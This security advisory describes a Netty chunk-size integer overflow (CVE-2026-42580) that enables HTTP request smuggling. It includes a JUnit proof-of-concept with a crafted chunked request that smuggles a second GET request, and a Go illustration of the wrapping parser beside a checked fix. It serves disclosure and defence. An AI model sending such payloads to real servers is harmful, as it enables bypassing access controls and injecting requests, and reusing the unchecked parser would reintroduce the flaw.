PT-2026-38373 · Maven · Io.Netty:Netty-Codec-Http

Published: 2026-05-07 · Updated: 2026-05-07 · CVE-2026-42580

CVSS v3.1: 6.5 (Medium)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Summary

Netty's chunk size parser silently overflows int, enabling request smuggling attacks.

Details

io.netty.handler.codec.http.HttpObjectDecoder#getChunkSize silently overflows int.
The hex chunk size is accumulated digit by digit as follows:
result *= 16; result += digit;
The result is checked only for negative values. A chunk-size line whose true value exceeds 32 bits can therefore wrap around to a small positive number that passes the check, so a carefully crafted chunk size is accepted as a valid size.

PoC

The test below shows Netty successfully parsing the second request, demonstrating how an attacker can smuggle a second request inside a chunked body.
```java
import io.netty.buffer.Unpooled;
import io.netty.channel.embedded.EmbeddedChannel;
import io.netty.handler.codec.http.HttpContent;
import io.netty.handler.codec.http.HttpRequest;
import io.netty.handler.codec.http.HttpRequestDecoder;
import io.netty.handler.codec.http.LastHttpContent;
import io.netty.util.CharsetUtil;
// JUnit 5 assumed for the test annotation and assertions
import org.junit.jupiter.api.Test;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertTrue;

@Test
public void test() {
  // The chunk size 0x100000004 wraps to 4 in a 32-bit int, so the decoder
  // reads only "test" as the chunk; the bytes after the terminating 0-chunk
  // are then parsed as a second, complete request.
  String requestStr = "POST / HTTP/1.1\r\n" +
      "Host: localhost\r\n" +
      "Transfer-Encoding: chunked\r\n\r\n" +
      "100000004\r\n" +
      "test\r\n" +
      "0\r\n" +
      "\r\n" +
      "GET /smuggled HTTP/1.1\r\n" +
      "Host: localhost\r\n" +
      "Content-Length: 0\r\n" +
      "\r\n";

  EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder());
  assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, CharsetUtil.US_ASCII)));

  // Request 1: header, the 4-byte chunk, and the last-content marker
  HttpRequest request = channel.readInbound();
  assertTrue(request.decoderResult().isSuccess());
  HttpContent content = channel.readInbound();
  assertTrue(content.decoderResult().isSuccess());
  assertEquals("test", content.content().toString(CharsetUtil.US_ASCII));
  content.release();
  LastHttpContent last = channel.readInbound();
  assertTrue(last.decoderResult().isSuccess());
  last.release();

  // Request 2: the smuggled GET is decoded as a separate, successful request
  request = channel.readInbound();
  assertTrue(request.decoderResult().isSuccess());
  last = channel.readInbound();
  assertTrue(last.decoderResult().isSuccess());
  last.release();
}
```
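To make the arithmetic from the Details section concrete, here is an added example (not Netty's code) in Go, whose int32 wraps on overflow exactly like a Java int: ChunkSizeWrapping accumulates a hex chunk-size line the way the advisory describes and rejects only negative results, while ChunkSizeChecked is a hardened variant that refuses the line before the accumulator can wrap. The function names and the hex-digit helper are this example's own.

```go
package main

import (
	"fmt"
	"math"
	"strings"
)

// hexDigit returns the value of an ASCII hex digit (either case), or -1.
func hexDigit(c byte) int32 {
	return int32(strings.IndexByte("0123456789abcdef", c|0x20))
}

// ChunkSizeWrapping mirrors the advisory's accumulation in a signed 32-bit
// int (Go's int32 wraps like a Java int) and rejects only negative results.
func ChunkSizeWrapping(hex string) (int32, error) {
	var result int32
	for i := 0; i < len(hex); i++ {
		d := hexDigit(hex[i])
		if d < 0 {
			return 0, fmt.Errorf("invalid hex digit %q", hex[i])
		}
		result *= 16
		result += d
	}
	if result < 0 {
		return 0, fmt.Errorf("negative chunk size")
	}
	return result, nil
}

// ChunkSizeChecked rejects the line before result*16+d can exceed MaxInt32.
func ChunkSizeChecked(hex string) (int32, error) {
	var result int32
	for i := 0; i < len(hex); i++ {
		d := hexDigit(hex[i])
		if d < 0 {
			return 0, fmt.Errorf("invalid hex digit %q", hex[i])
		}
		if result > (math.MaxInt32-d)/16 {
			return 0, fmt.Errorf("chunk size %q overflows int", hex)
		}
		result = result*16 + d
	}
	return result, nil
}

func main() {
	fmt.Println(ChunkSizeWrapping("100000004")) // PoC chunk-size line; prints "4 <nil>"
}
```

The PoC's line "100000004" is 0x100000004, which the wrapping parser turns into a chunk of 4 bytes, while the checked parser reports an overflow on the ninth digit.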

Impact

HTTP Request Smuggling: Attacker injects arbitrary HTTP requests

Fix

Weakness Enumeration

HTTP Request/Response Smuggling

Related Identifiers

CVE-2026-42580
GHSA-M4CV-J2PX-7723

Affected Products

Io.Netty:Netty-Codec-Http